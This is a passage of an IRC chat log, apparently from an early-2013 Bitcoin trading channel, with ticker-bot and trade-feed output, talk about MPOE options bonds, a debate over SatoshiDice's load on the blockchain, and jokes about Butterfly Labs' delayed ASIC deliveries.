00:30:46 There are currently 930.16598 bitcoins demanded at or over 30.0 USD, worth 27935.0288526 USD in total. Feb 26 00:30:49 some fearmongering Feb 26 00:30:53 ;;ticker Feb 26 00:30:54 BTCUSD ticker | Best bid: 30.13001, Best ask: 30.14999, Bid-ask spread: 0.01998, Last trade: 30.14999, 24 hour volume: 26135.40088171, 24 hour low: 29.50001, 24 hour high: 30.40000, 24 hour vwap: 30.05456 Feb 26 00:31:24 ;;calc 30.12 Feb 26 00:31:24 30.12 Feb 26 00:31:28 i guess in 4 days a peculiar platinum coin will be unveiled Feb 26 00:31:39 ;;calc 30.12 * .012 Feb 26 00:31:39 0.36144 Feb 26 00:32:01 ;;bids 29 Feb 26 00:32:03 There are currently 8834.2843 bitcoins demanded at or over 29.0 USD, worth 259243.946894 USD in total. Feb 26 00:32:03 [MPEX] [S.MPOE] 9300 @ 0.00077013 = 7.1622 BTC [-] Feb 26 00:32:39 ...a top administration official warned that the nation's borders would be less secure. oh my Feb 26 00:35:08 S.DICE div? lmao somebody should tell obama to buy shares to save the US budget Feb 26 00:35:29 [MPEX] [S.MPOE] 16000 @ 0.00076119 = 12.179 BTC [-] Feb 26 00:35:30 or put a trillion on "lessthan 1" Feb 26 00:35:30 [MPEX] [S.MPOE] 15478 @ 0.00076118 = 11.7815 BTC [-] Feb 26 00:35:34 [MPEX] [S.MPOE] 2464 @ 0.00075891 = 1.87 BTC [-] Feb 26 00:35:36 [MPEX] [S.MPOE] 11962 @ 0.00075883 = 9.0771 BTC [-] Feb 26 00:35:45 [MPEX] [S.MPOE] 17987 @ 0.00075864 = 13.6457 BTC [-] Feb 26 00:35:47 [MPEX] [S.MPOE] 36100 @ 0.00075743 = 27.3432 BTC [-] Feb 26 00:35:49 [MPEX] [S.MPOE] 14767 @ 0.00075619 = 11.1667 BTC [-] Feb 26 00:35:51 [MPEX] [S.MPOE] 7100 @ 0.00075518 = 5.3618 BTC [-] Feb 26 00:35:52 [MPEX] [S.MPOE] 7900 @ 0.00075418 = 5.958 BTC [-] Feb 26 00:36:01 [MPEX] [S.MPOE] 6200 @ 0.00075343 = 4.6713 BTC [-] Feb 26 00:36:03 [MPEX] [S.MPOE] 26700 @ 0.00075335 = 20.1144 BTC [-] Feb 26 00:36:03 [MPEX] [S.MPOE] 16853 @ 0.00075204 = 12.6741 BTC [-] Feb 26 00:36:32 there she pops Feb 26 00:36:41 jurov is a trillion more than 0.01 btc yet ? Feb 26 00:37:27 mircea: it's always been. I'd exchange 0.01 BTC for a trillion anytime Feb 26 00:37:54 :p Feb 26 00:38:08 Buy myself a few thousand gold bars and some companies... Feb 26 00:39:02 [MPEX] [O.BTCUSD.P750T] 530 @ 1.49949501 = 794.7324 BTC [-] Feb 26 00:39:17 better off buying tungsten bars Feb 26 00:39:22 should have sold moar at 77740.. but good :) Feb 26 00:39:42 Oh, I'm fine with buying tons of bars of every metal. Feb 26 00:39:49 Many large multinationals have a market cap uner 1 billion... I could buy myself a thousand multinationals at least Feb 26 00:40:37 itd be nice if mr whale can bump dice to before pre erkik dump levels Feb 26 00:41:17 seriously, when USG issues btc bonds, what interest rate would you ask? Feb 26 00:41:31 i wouldn't go below 10% monthly Feb 26 00:42:06 I'd charge them royalties on the name BTC-BOND Feb 26 00:42:07 call me when its a palladium coin Feb 26 00:42:10 capital expenses Feb 26 00:42:24 jurov why 10% ?! Feb 26 00:42:30 wow that put is deep in the money Feb 26 00:42:44 shorting Feb 26 00:43:02 its the fourth big short position added in the last 3 days Feb 26 00:43:14 MPBOR+5% ... but should prolly ask more Feb 26 00:43:31 you can lose from mpbor, right? Feb 26 00:44:03 Bugpowder_ short put = long btc Feb 26 00:44:19 mpbor itself is always positive... only the end result of mpoe can be negative, that's different thing Feb 26 00:45:00 mircea_popescu: Thank you for today's lesson Feb 26 00:45:21 lol Feb 26 00:46:44 mircea_popescu: the whale lives! Feb 26 00:46:55 o? Feb 26 00:46:56 jurov: MPBOR can be negative... Feb 26 00:47:14 no? Feb 26 00:49:52 no mircea eats the losses Feb 26 00:50:22 look on https://docs.google.com/spreadsheet/ccc?key=0AlhB0UHVxS67dGpBc2Rub3FtLTdHZ3ZPb09DY2pHWlE Feb 26 00:50:33 the "net result" can be negative Feb 26 00:50:56 but mpbor was always positive (it's not there explicitly) Feb 26 00:51:18 but you can compute it as interest paid out/raised capital Feb 26 00:53:02 only when exercises + interest paid out > earnings from sales of options, then net result = mpbor Feb 26 00:53:14 derp Feb 26 00:53:23 only when exercises + interest paid out < earnings from sales of options, then net result = mpbor Feb 26 00:58:13 right Feb 26 00:58:33 still, MPBOR could be a big loser on a very bad month Feb 26 00:58:43 Although quite good history Feb 26 00:58:51 no Feb 26 00:58:55 yes Feb 26 00:59:06 nooo! thats impossible Feb 26 00:59:07 maybe Feb 26 00:59:25 has happened. Feb 26 00:59:58 MPBOR is funds lent for options? As such, losses by the options bot would be taken from MPBOR deposits nay? Feb 26 01:00:33 mircea_popescu usually ends up putting up capital in those scenarios Feb 26 01:00:44 thestringpuller: you don't know what you are talking about Feb 26 01:01:02 MPBOR is high risk, limited reward Feb 26 01:01:06 yes but in the end the proportional part is taken from all bonds Feb 26 01:01:21 Not attractive IMHO Feb 26 01:01:32 Bugpowder_ it's only risk if it meets your desired reward. Feb 26 01:01:40 what IS attractive is owning 85% of S.MPOE and collecting all the cream off the top Feb 26 01:01:50 lol Feb 26 01:01:57 expensive endeavor :P Feb 26 01:02:26 Bugpowder_ that was last feasible in April Feb 26 01:02:26 start your own MPOE Feb 26 01:02:49 or at least an MPOE bot Feb 26 01:02:58 smickles tried that Feb 26 01:03:04 it lost money Feb 26 01:03:04 the collateral requirements will kill you though Feb 26 01:03:12 I am shocked Feb 26 01:03:25 he kept buying high and selling low Feb 26 01:03:27 SOE bot didnt do so well :/ Feb 26 01:03:45 or buying high and not selling actually Feb 26 01:03:59 after MPBPT will get psychologically entrenched, we'll see ;) Feb 26 01:04:11 it may cease being a passthrough Feb 26 01:04:14 didn't do too well eh... Feb 26 01:04:49 but i prefer to run it as is now Feb 26 01:04:56 I think you need minimum 10,000 BTC nut to run an options bot effectively Feb 26 01:05:13 maybe 5,000 btc... Feb 26 01:05:14 you need infinite capital (tm) Feb 26 01:05:21 lol Feb 26 01:05:24 srsly. Feb 26 01:05:32 ideally Feb 26 01:06:01 make a bot which keeps outbidding MPOE bot by 1 satoshi, and undercutting ask by 1 satoshi. Feb 26 01:06:40 lol Feb 26 01:06:42 guaranteed win on others' algorythm without any of the work! Feb 26 01:06:45 [BTCTC] [S.MPOE-PT] 97 @ 0.00075 = 0.0728 BTC [+] Feb 26 01:06:49 [BTCTC] [S.MPOE-PT] 5963 @ 0.00075 = 4.4723 BTC [+] Feb 26 01:06:51 [BTCTC] [S.MPOE-PT] 1000 @ 0.00075 = 0.75 BTC [+] Feb 26 01:07:43 Namworld, that bot still needs equal capital to most mpoe bondholders Feb 26 01:08:19 nah, not necessarily. Just make smaller amount both sides. Feb 26 01:08:49 i had more devious idea... there are periods when mpoe bot is thinking and no offers are listed Feb 26 01:09:08 was thinking to put some rotten apples there inbetween Feb 26 01:09:28 but dunno how successfult would that be Feb 26 01:09:43 hmkay... probably not a lot considering the short timeframe Feb 26 01:10:27 [BTCTC] [GSDPT] 44 @ 0.00599 = 0.2636 BTC [-] Feb 26 01:10:29 [BTCTC] [GSDPT] 967 @ 0.006 = 5.802 BTC [+] Feb 26 01:11:15 actually i remembered i did the frontrunning on options few months ago but stopped Feb 26 01:11:40 i had to tie the bitcoins on multiple calls/puts and wait for weeks for some order to come Feb 26 01:13:25 better to focus on frontrunning one or two most traded things Feb 26 01:13:59 sigh...now if my bots weren't caught like deer in headlights on last spike Feb 26 01:15:38 [BTCTC] [BASIC-MINING] 5 @ 0.3499 = 1.7495 BTC [-] Feb 26 01:15:38 but let them stay KISS... can't optimize for everything anyway Feb 26 01:19:16 Namworld: Acutally that bot needs MORE capital since it does not appear that the MPOE bot counts created but non-sold options against the total capital Feb 26 01:19:25 which dilutes the returns Feb 26 01:20:01 the collateral for unsold options returns to you Feb 26 01:20:09 yeah Feb 26 01:20:17 but its not available for other offers Feb 26 01:20:28 ? Feb 26 01:20:43 [MPEX] [S.MPOE] 2547 @ 0.00075204 = 1.9154 BTC [-] Feb 26 01:20:43 [MPEX] [S.MPOE] 4111 @ 0.00075113 = 3.0879 BTC [-] Feb 26 01:20:47 [BTCTC] [GSDPT] 15 @ 0.00609 = 0.0914 BTC [+] Feb 26 01:20:49 if you do SPLIT/MKFUT, you DO get collateral - exercises back Feb 26 01:20:56 in the end of month Feb 26 01:20:58 ;;calc 1000*75*2 Feb 26 01:20:59 150000 Feb 26 01:21:20 you need 150,000 BTC to offer up what the MPOE bot offers. Feb 26 01:21:44 BEFORE anything gets sold Feb 26 01:21:44 [BTCTC] [GSDPT] 60 @ 0.0061 = 0.366 BTC [+] Feb 26 01:24:07 it's 75 of them? not less? but you do have a point. Feb 26 01:26:41 [BTCTC] [S.MPOE-PT] 3905 @ 0.00075 = 2.9288 BTC [+] Feb 26 01:30:37 ;;calc 100185337*0.00075/2 Feb 26 01:30:38 37569.501375 Feb 26 01:32:23 100million s.mpoe could have sold for 30-40k ... yea, nowhere near > 100k requried for collateral Feb 26 01:33:31 It's a huge competitive advantage. Feb 26 01:34:08 Other people basically are limited to placing bids and hoping someone shorts into them so they can then resell higher Feb 26 01:36:17 there will be other options exchange soon, i'm interesting how they will solve this. Feb 26 01:36:21 *interested Feb 26 01:42:20 [BTCTC] [MININGCO.ETF] 39 @ 0.58 = 22.62 BTC [-] Feb 26 01:42:22 [BTCTC] [MININGCO.ETF] 12 @ 0.58 = 6.96 BTC [-] Feb 26 01:43:41 [BTCTC] [S.DICE-PT] 1843 @ 0.0062 = 11.4266 BTC [-] Feb 26 01:43:43 what crawled up this guy's ass? https://bitcointalk.org/index.php?topic=145510.msg1559409#msg1559409 Feb 26 01:44:47 [BTCTC] [GSDPT] 940 @ 0.0061 = 5.734 BTC [+] Feb 26 01:44:49 [BTCTC] [GSDPT] 1000 @ 0.0061 = 6.1 BTC [+] Feb 26 01:45:28 [BTCTC] [GSDPT] 1 @ 0.00619 BTC [+] Feb 26 01:45:30 [BTCTC] [GSDPT] 1000 @ 0.0062 = 6.2 BTC [+] Feb 26 01:45:31 [BTCTC] [GSDPT] 994 @ 0.00623 = 6.1926 BTC [+] Feb 26 01:45:33 [BTCTC] [GSDPT] 7000 @ 0.0063 = 44.1 BTC [+] Feb 26 01:46:48 Thick: He's saying "Blocking SD directly is the only known viable method of Bitcoin surviving this attack." and I think he's almost alone in that... Feb 26 01:47:19 i don't think he is Feb 26 01:47:32 Close to alone... Feb 26 01:47:50 i dont agree with him, i think fees need to go a lot higher Feb 26 01:48:14 Just doesn't fit Bitcoin's to start saying what is or what is not allowed. Feb 26 01:48:35 Only way to have a block against SD is if all miners simply exclude those transactions. Feb 26 01:48:38 pigeons: transactions relay to all nodes, regardless of the transaction fee Feb 26 01:48:42 fees will have to go higher if traffic slows Feb 26 01:48:49 right? Feb 26 01:48:52 the fees won't fix anything Feb 26 01:49:03 at least not with regard to SD Feb 26 01:49:03 if there's mass bitcoin adoption, people won't want to wait Feb 26 01:49:16 so paying fee is the only way to expedite Feb 26 01:49:22 iz: yes but if fees are higher people will be rewarded for their work, and spammers will be disincentivized Feb 26 01:49:27 and miners prioritize by value right? Feb 26 01:49:31 everyone relays transactions, even if they don't pickup the transaction and regardless of the fees Feb 26 01:50:03 pigeons: SD will still spam the network, regardless of the fees Feb 26 01:50:20 but the network seems to be doing fine, no? Feb 26 01:50:25 no Feb 26 01:50:32 have you seen how much the blockchain is growing? Feb 26 01:50:35 i have Feb 26 01:50:49 but all my transactions go thru quickly Feb 26 01:50:55 or, quick enough Feb 26 01:51:02 oh not this again.... Feb 26 01:51:07 basically we are recording all SD transaction history in the blockchain forever Feb 26 01:51:10 that everyone downloads Feb 26 01:51:20 theyd dont have to Feb 26 01:51:31 they can use web-based wallets Feb 26 01:51:33 iz: so what? Feb 26 01:51:36 the blockchain is fine. I'll happily accept 1TB per month if that enables btc to be widely used Feb 26 01:52:02 transaction fees won't make a difference until we start hitting the max blocksize Feb 26 01:52:03 if you didnt pay the tx fee, how long will it take? Feb 26 01:52:32 i mean really, the wait time to let qt sync was too long for the average person a while ago Feb 26 01:53:14 i'm just saying it's not a non-problem, not that it's an insurmountable one Feb 26 01:53:19 word Feb 26 01:53:26 i wasnt trying to kick up the debate Feb 26 01:54:14 just amused that the guy thinks he can lean so far in one direction and not fall over Feb 26 01:54:54 [MPEX] [S.BBET] 1 @ 0.00196487 BTC [-] Feb 26 01:57:16 evening Namworld Feb 26 01:57:57 somehow I didnt see you talking earlier. hehe Feb 26 02:01:40 eh Feb 26 02:09:46 [BTCTC] [S.BBET-PT] 910 @ 0.0022 = 2.002 BTC [+] Feb 26 02:12:54 jurov: how many nodes will be running under a +1tb/month scenario? Feb 26 02:13:21 any business with some employees can afford that Feb 26 02:13:31 jurov: how much confidence will people have in bitcoin if there are only 7 nodes Feb 26 02:13:54 let's say it will happen in 2 years Feb 26 02:14:03 there will be 10TB hard drives Feb 26 02:14:21 for the same prices as 2Tb today Feb 26 02:15:08 the reality is SD exploits a weakness in bitcoin Feb 26 02:15:09 don't tell me only 7 nodes can afford buying one harddrive per year Feb 26 02:15:41 how many would care enough to? Feb 26 02:15:56 [BTCTC] [S.BBET-PT] 3 @ 0.0022 = 0.0066 BTC [+] Feb 26 02:16:02 maybe in 2 years there is something else that doesn't have the same flaws being actively exploited to the detriment of everyone else.. Feb 26 02:16:08 anyone who wants to accept transactions Feb 26 02:16:14 it spreads teh cost of its spam attack to idiots already willing to throw money away Feb 26 02:16:33 what SD does can be achieved in a scalable way easily Feb 26 02:16:46 just because the problem can be solved by stupidly throwing money at it, doesn't mean it's not a problem that could have a more elegant solution Feb 26 02:16:50 [MPEX] [S.BBET] 498 @ 0.00196487 = 0.9785 BTC [-] Feb 26 02:16:51 SD just amplifies that weakness. and if it wasn't SD it'd be someone else. The problem has to be solved, and it can't be solved by banning. It's a fundamental architectural problem. Feb 26 02:16:51 [MPEX] [S.BBET] 457 @ 0.00196488 = 0.898 BTC [+] Feb 26 02:16:53 [MPEX] [S.BBET] 45 @ 0.001965 = 0.0884 BTC [+] Feb 26 02:17:19 maximian: the weakness was always there, the cost for one person to attack was prohibitive, SD works aroudn that Feb 26 02:17:36 so maybe you should stop alienating evoorhees and make that easier for him to do that way? Feb 26 02:17:47 because of zero confs? Feb 26 02:18:05 jurov: wat Feb 26 02:18:19 and my 2cents... if bitcoin will be centralized, it will not be because of blocksize, but because of asics Feb 26 02:19:23 my 2c.. I could run a bitcoin node on 1990's hardware before SD Feb 26 02:19:32 as asicminer handily proved Feb 26 02:19:45 how long before we can't run one on 2012 hardware? Feb 26 02:19:50 yeah, everyone is a node, even if they aren't mining Feb 26 02:20:21 this is a problem with bitcoin p2p, not really just with bitcoin mining Feb 26 02:21:13 miners' pipe dreams... bitcoins should be forever limited to 7tx/second. because obviously having $50 tx fees will give power to teh people Feb 26 02:21:17 and btw the '90s hardware problem is processing not disk Feb 26 02:22:19 99% people will not ever see a bitcoin in whole life, but they will be able to run full node, that's the ideal Feb 26 02:22:43 i have no idea what you just said Feb 26 02:23:19 i'll try again. how many businesses own a car? Feb 26 02:24:16 why wouldn't they pay much less for a full node that can deal with 1TB/month to enable them access to bitcoin system? Feb 26 02:24:34 lol Feb 26 02:24:45 you failed on that try Feb 26 02:24:58 why not? Feb 26 02:25:13 typically I would say that a high end server is more expensive for a business than a car Feb 26 02:25:30 7tx/sec = 604,800/day. Not nearly enough. Feb 26 02:25:45 jurov: because credit card payment processing is cheaper than that. Feb 26 02:26:13 1. that does not need hig end server Feb 26 02:26:26 2. credit cards are *expensive* for merchants Feb 26 02:26:47 why would a business pay more for bitcoin processing, when they could just do "expensive" credit card processing that is accepted by way more clients? Feb 26 02:27:21 so they shouldn't use bitcoin, you say? Feb 26 02:27:37 [MPEX] [S.MPOE] 7168 @ 0.00075677 = 5.4245 BTC [+] Feb 26 02:27:40 with 604,800 txs/day they will not, indeed Feb 26 02:27:42 you're basically trying to say that credit card processing is too expensive out of one side of your mouth, while saying any business that wants to use bitcoin should be have plenty of money to blow Feb 26 02:27:52 only banks and govts will use bitcoin in the end Feb 26 02:28:12 anyway.. i'm gonna head home now.. peace all Feb 26 02:28:42 jurov: I don;t hink anyone is arguing against that, if adoption is successful Feb 26 02:28:51 don't think* Feb 26 02:28:54 if you insist accepting 1TB/mon means blowing tons of money.... Feb 26 02:28:58 be it so Feb 26 02:29:03 i can do it chepaer Feb 26 02:29:12 peace Feb 26 02:29:48 More transactions is better than less. In the future we won't have 2012 hardware, we'll have future hardware. Feb 26 02:29:57 do you know how much 1TB costs businesses? Feb 26 02:30:10 its a LOT more than it costs you Feb 26 02:30:38 the tx is still unconfirmed wtf Feb 26 02:30:58 if they have to back the terabyte up, then yeah Feb 26 02:31:08 talk to a SAN guy Feb 26 02:31:27 http://blockchain.info/tx-index/56416802/e70e54774c58101e7a6de4bcc5a04a9f3091cee4022965aebc264a705cb3c732 Feb 26 02:31:32 proper storage is not cheap Feb 26 02:31:37 [BTCTC] [BTC-TRADING-PT] 10 @ 0.0841 = 0.841 BTC [-] Feb 26 02:31:54 [BTCTC] [BTC-TRADING-PT] 20 @ 0.0841 = 1.682 BTC [-] Feb 26 02:32:19 blockchain doesn't need to be stored properly. you just buy commoditized server with it preinstalled and backup only the wallet. it breaks? buy another one Feb 26 02:32:42 or copy it from guy next door Feb 26 02:32:54 businesses don't do that Feb 26 02:33:18 okay, you say so Feb 26 02:33:39 i was admin too, saw how things are done Feb 26 02:33:50 just in other part of the world Feb 26 02:34:11 Ya, the blockchain isn't going to be lost for long if it is lost. I don't think they'd need anything fancy for it. Feb 26 02:36:08 [BTCTC] [LTC-MINING] 4 @ 0.38 = 1.52 BTC [-] Feb 26 02:36:10 [BTCTC] [LTC-MINING] 26 @ 0.393 = 10.218 BTC [+] Feb 26 02:36:28 the issue is that you need to get critical mass before all the businesses are going to look after the network for you Feb 26 02:36:59 if you make it prohibitive for Joe Asshat to do it for you until then, then you never get there Feb 26 02:37:12 how you want to get critical mass when it can't handle even one casino??? Feb 26 02:37:36 you get that casino to keep its own database Feb 26 02:37:46 errr...it can handle it finely, just some peeps fear it irrationally Feb 26 02:37:50 instead of using yours that isn't designed for that Feb 26 02:37:56 casinos usually use chips, and don't have their clients bet using credit card payments Feb 26 02:38:00 It's how that casino is doing it's business. You don't go up and change money after every bet when you are in a casino, do you? Feb 26 02:38:18 OneMiner: good analogy Feb 26 02:38:47 now imagine million supermarkers/car dealers/etc. in the place of that casino] Feb 26 02:39:09 imagine a supermarket where you can only pay for one item at a time Feb 26 02:39:10 they do need to charge money every time Feb 26 02:39:52 one item at a time though? Feb 26 02:39:52 i can't believe this debate still exists. Feb 26 02:40:06 I don't think its going away Feb 26 02:40:07 the jesuscrazy people were defeated already. forget about it. Feb 26 02:40:09 [BTCTC] [PAJKA.BOND] 50 @ 0.1 = 5 BTC [+] Feb 26 02:40:09 jurov With SD a single person can place many bets with a small amount of coins. Each bet = two transactions. If it was a supermarket, they'd have to be making a seperate transaction for each product, overcharging you by a little and sending you a satoshi back. THEN it would be similar. Feb 26 02:40:12 either SD changes or bitcoin does Feb 26 02:40:14 it's like arguing the peace of westfalia. Feb 26 02:41:03 you will kill bitcoin together with sd, then. at least prevent the mass adoption you are dreaming about. Feb 26 02:41:32 equally you will kill it if nobody can run a node Feb 26 02:41:36 Not at all! I'd argue that the network is handling it very well. Feb 26 02:41:53 look! it's really simple! bitcoin was designed to do 1mb blocks. if it can't do 1mb blocks it sucks, dies, we move to solidcoin. Feb 26 02:42:00 someone just needs to make a better version of SD that works in harmony with bitcoin Feb 26 02:42:04 if it can do 1mb blocks and they get filled, tx fees increase Feb 26 02:42:20 it was not designed to do 1mb blocks. it was just some limit to try with Feb 26 02:42:25 right. Feb 26 02:42:31 if it can't do EVEN THAT then forget it. Feb 26 02:42:36 iz no. Feb 26 02:42:45 bitcoin needs to be able to stfu and suck this cock. Feb 26 02:42:59 suck it well, ask for seconds. Feb 26 02:43:06 then maybe it gets seconds. Feb 26 02:43:23 iz, you're going to cripple the whole system just because of political reason, don't you see that? Feb 26 02:43:37 its not political its technical Feb 26 02:43:49 SD does not scale Feb 26 02:43:50 jurov: how would my proposal of creating a better version of SD going to cripple the whole system? Feb 26 02:43:56 sigh. Feb 26 02:44:06 what do you even think would "cripple the whole system"? Feb 26 02:44:11 iz you do not get to tell people how to use it. Feb 26 02:44:12 because it doesnt stop someone else from making the same problem in a new way Feb 26 02:44:22 why is this so difficult to grasp ? Feb 26 02:44:25 iz: making rules, you know like the evil state Feb 26 02:44:32 i'm not telling people how to use it, i just suggested making a better alternative that people could choose to use Feb 26 02:44:38 so make it. Feb 26 02:44:43 the problem is that there isn't an alternative Feb 26 02:44:43 it breaks teh very libertarianality of bitcoin!!!! Feb 26 02:44:43 iz, preventing bitcoin to actually accept enough transactions to be really used Feb 26 02:44:46 SD is doing it wrong. But it's up to miners to increase the TX fee and price them out of business. But it's democratic. Each miner will have to choose to allow 0.0005BTC fees or not. Feb 26 02:45:04 I've set my fee one unit higher personally. Feb 26 02:45:09 OneMiner except it's already been argued to death. Feb 26 02:45:23 as it is, if miners tried it sd would just make its own miner drive the other miners out of business. Feb 26 02:45:30 if it was anything other "more useful" that SD would you accept raising the limit? Feb 26 02:45:38 That'll continue, it's up to them. Feb 26 02:45:39 if yes, then it is political indeed Feb 26 02:45:47 make an alt coin for every bulky service Feb 26 02:46:27 mircea_popescu: i'm still afraid of the legal implications of running a gambling business Feb 26 02:46:29 if cgminer had a "no sd" flag, i'd set it Feb 26 02:46:31 if cryptocurrency is widely adopted, it's probly what will happen anyway Feb 26 02:46:36 that's why i'm not doing it Feb 26 02:46:38 otherwise my pools include sd blocks Feb 26 02:46:41 alt coin for every gov Feb 26 02:46:44 faik Feb 26 02:46:47 but SD is braindead simple to make a clone of Feb 26 02:46:52 sigh. Feb 26 02:46:58 it's just rolling dice Feb 26 02:47:05 jcpham do you pool mine? Feb 26 02:47:11 i guess every coder has to be humiliated individually to get it. Feb 26 02:47:12 yes Feb 26 02:47:32 jcpham Then the best you can do is mine in a pool that blocks those transactions. Feb 26 02:47:42 i mine at hashpower.com Feb 26 02:47:45 you can lease me Feb 26 02:48:20 And it's not a scalpel, it's a grenade. You'd block all TXs with SDs fee or lower. Feb 26 02:48:26 see what i did there Feb 26 02:48:35 jcpham I was too. Now I'm on p2pool. Feb 26 02:48:52 I can make my own choices now. I'm independent. :) Feb 26 02:49:17 i think i just mined a bajillion freicon last week Feb 26 02:49:29 *freicoin Feb 26 02:49:42 i got like 1500 friecoin.. whats the exchange rate now Feb 26 02:49:48 haha, I've been trying to get merged mining going with p2pool. I think I messed it up somehow. :( Feb 26 02:49:50 no clue Feb 26 02:49:59 i solo mined..... Feb 26 02:50:04 36 blocks/sec Feb 26 02:50:07 i swear Feb 26 02:50:12 [MPEX] [S.MPOE] 13300 @ 0.00075677 = 10.065 BTC [+] Feb 26 02:50:36 iz : no miner has the initiative not to accept 1 satoshi fee tx Feb 26 02:50:58 except for the stupid ones Feb 26 02:51:15 i mine for profit...whoever pays the most Feb 26 02:52:04 you just stick your mining cock in any hole that comes along Feb 26 02:52:07 if you dont pay the tx fee.. how long will it take to confirm? Feb 26 02:52:11 you don't decide what tx get through Feb 26 02:52:42 moving old coins is free Feb 26 02:52:59 e70e54774c58101e7a6de4bcc5a04a9f3091cee4022965aebc264a705cb3c732 Feb 26 02:53:00 Bowjob If my miner was the only one in the world, it wouldn't go through. Feb 26 02:53:16 the guy didnt put a tx. -_- still waiting for it to confirm Feb 26 02:53:33 How cheap.... The fee is almost nothing. Feb 26 02:54:07 I clicked on "Relayed by IP".. Feb 26 02:54:18 a bunch of ips appeared.. is taht a good thing orr.. Feb 26 02:54:50 its ok Feb 26 02:54:54 Means that those nodes broadcasted the TX. Feb 26 02:54:58 are you making your first btc tx? Feb 26 02:55:05 The network has seen it. Feb 26 03:15:19 [BTCTC] [S.MPOE-PT] 4035 @ 0.00075 = 3.0263 BTC [+] Feb 26 03:21:50 [HAVELOCK] [SDICE] 3 @ 0.65 = 1.95 BTC [+] Feb 26 03:22:50 [HAVELOCK] [SDICE] 14 @ 0.635 = 8.89 BTC [-] Feb 26 03:25:26 ;;ticker Feb 26 03:25:28 BTCUSD ticker | Best bid: 30.25402, Best ask: 30.35001, Bid-ask spread: 0.09599, Last trade: 30.38000, 24 hour volume: 26226.94641198, 24 hour low: 29.60000, 24 hour high: 30.40000, 24 hour vwap: 30.10472 Feb 26 03:32:50 [HAVELOCK] [KCIM] 35 @ 1 = 35 BTC [+] Feb 26 03:37:47 [MPEX] [O.BTCUSD.P330T] 750 @ 0.34699613 = 260.2471 BTC [-] Feb 26 03:37:49 [MPEX] [O.BTCUSD.P310T] 1000 @ 0.29393728 = 293.9373 BTC Feb 26 04:07:26 [MPEX] [S.MPOE] 2500 @ 0.00075113 = 1.8778 BTC [-] Feb 26 04:30:55 [BTCTC] [BASIC-MINING] 25 @ 0.3499 = 8.7475 BTC [-] Feb 26 04:31:25 [BTCTC] [BASIC-MINING] 25 @ 0.33311 = 8.3278 BTC [-] Feb 26 04:32:09 [BTCTC] [BASIC-MINING] 3 @ 0.34 = 1.02 BTC [+] Feb 26 04:32:13 [BTCTC] [BASIC-MINING] 6 @ 0.3331 = 1.9986 BTC [-] Feb 26 04:39:36 whoa less than 2! Feb 26 04:40:17 the what? Feb 26 04:41:05 Guest00001 Feb 26 04:41:27 $36k payout Feb 26 04:41:32 hit it! Feb 26 04:42:56 there's kinda insufficient drama, if this keeps up bitcoin will tank Feb 26 04:43:26 manufacture some Feb 26 04:43:51 [HAVELOCK] [HIM] 2 @ 15.9 = 31.8 BTC [+] Feb 26 04:44:30 nah it'd be too easy Feb 26 04:46:34 http://www.par-anoia.net/releases2013.html Feb 26 04:47:12 has there ever been a >2 part of the chain orphaned? Feb 26 04:49:50 [HAVELOCK] [HIM] 1 @ 16 BTC [+] Feb 26 04:50:18 im pretty sure Feb 26 04:50:52 50+ was the record iirc Feb 26 05:20:08 https://forums.butterflylabs.com/announcements/692-bfl-asic-status-2.html#post16043 Feb 26 05:24:04 i suppose that makes the bitbet pretty much resolved... Feb 26 05:24:20 The simple fact of the matter is there hasn't been any solid updates to offer. Feb 26 05:24:24 myeah Feb 26 05:24:25 a well. Feb 26 05:24:58 "As I've written in previous posts, we are dealing with such an accelerated time scale that all of these facilities simply aren't used to dealing with." Feb 26 05:24:59 le lol. Feb 26 05:25:45 that's american industry for you i guess Feb 26 05:25:57 shoulda made em in china Feb 26 05:26:30 We expect at least some of the chips to be on their way to Chicago by Tuesday, where they will be mounted and sent out to our engineers and KC for testing and final MCU programming. Feb 26 05:26:49 yup, he's not making march 1st. Feb 26 05:27:05 i'm no engineer, but it sounds so ghetto to be wasting 1000 chips to do a macguyver test Feb 26 05:27:06 Right now, I'm planning on a week from Friday to be the day Feb 26 05:27:13 way ghetto. Feb 26 05:27:16 this is never delivering. Feb 26 05:28:03 never we think they'll next tuesday, always we think they'll be on the way to another step by next tuesday Feb 26 05:28:10 [BTCTC] [BTC-TRADING-PT] 1 @ 0.0763 BTC [-] Feb 26 05:28:28 well, as it turns out that 1500 btc on bitbet will be the most btc anyone makes out of bfl Feb 26 05:28:34 lol Feb 26 05:28:37 hahah Feb 26 05:28:44 mp have you actually bet on it? Feb 26 05:28:47 yes. Feb 26 05:28:49 although, what if he's baiting the bet Feb 26 05:28:56 you're the 200 BTC no? Feb 26 05:28:57 unlikely Feb 26 05:29:02 ThickAsThieves it's closed already, so what can it do ? Feb 26 05:29:04 but a big mess if he did Feb 26 05:29:10 i meant if it resolved Feb 26 05:29:11 theres this 500 BTC bet on yes Feb 26 05:29:17 that hurts like a bitch Feb 26 05:29:19 before the 1st Feb 26 05:30:31 josh could have come clean and tell us he couldnt ship by 1st Feb 26 05:30:36 16-02-13 01:27 No Feb 26 05:30:38 but instead he said "its close" Feb 26 05:30:39 i like that string of no Feb 26 05:30:51 like 20+ bets lol Feb 26 05:31:41 a 50btc bet at 710 weight Feb 26 05:31:56 does that even make any profit? Feb 26 05:32:46 you always make a profit. Feb 26 05:32:50 [BTCTC] [BASIC-MINING] 1 @ 0.35 BTC [+] Feb 26 05:33:14 ;;calc 710 * 50 / 60000000 * 800 Feb 26 05:33:15 0.473333333333 Feb 26 05:33:27 theres only like 3 big YES votes on the side Feb 26 05:33:32 aaactually... i think you're right, he owes .5 to the house and makes .473 Feb 26 05:33:33 500, 100, and 115 Feb 26 05:33:33 net loss Feb 26 05:33:45 sad Feb 26 05:34:18 was the 50 btc you? Feb 26 05:34:30 nah Feb 26 05:34:36 i didnt bet in that one Feb 26 05:34:44 so they lose money on it.. even if they won? Feb 26 05:35:06 yeah like 0.03 btc Feb 26 05:35:58 the huge bets just felt like something fishy was going on Feb 26 05:36:02 so i stayed out of it Feb 26 05:36:10 https://forums.butterflylabs.com/announcements/692-bfl-asic-status-2.html#post16043 Feb 26 05:36:14 only fair, bets on the 21st that bfl won't deliver by 1st Feb 26 05:36:16 delicious update delay again Feb 26 05:36:30 Bowjob at least they beat all other vendors. Feb 26 05:36:41 huh Feb 26 05:36:41 how Feb 26 05:36:46 also "everyone knows" bfl is worth more than mpex Feb 26 05:36:53 Bowjob : /sarcasm Feb 26 05:36:53 lol Feb 26 05:37:08 that dude was such a lolcow i'll be sad to see him go Feb 26 05:37:33 shits about to hit the fan.. bfl customers who used to defend josh are getting pissed Feb 26 05:37:36 then again this is bitcoin, he'll prolly be 